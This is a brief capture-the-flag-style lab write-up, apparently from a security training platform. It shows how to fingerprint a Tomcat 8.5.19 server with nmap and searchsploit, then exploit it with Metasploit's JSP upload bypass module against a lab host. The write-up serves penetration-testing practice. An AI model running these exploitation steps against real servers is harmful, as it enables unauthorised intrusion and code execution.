Windows: Java Web Server

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine, which runs a vulnerable Java web server, will be accessible at demo.ine.local.

Your task is to fingerprint the application using the tools available on the Kali machine and then exploit the application using the appropriate Metasploit module.

Objective: Exploit the application and retrieve the flag!

Tools

The best tools for this lab are:

  • Nmap

  • Metasploit Framework

  • Firefox

Writeup

nmap -sSVC demo.ine.local
searchsploit Apache Tomcat 8.5.19
msfconsole
search JSP Upload Bypass
use exploit/multi/http/tomcat_jsp_upload_bypass
set rhosts demo.ine.local
run
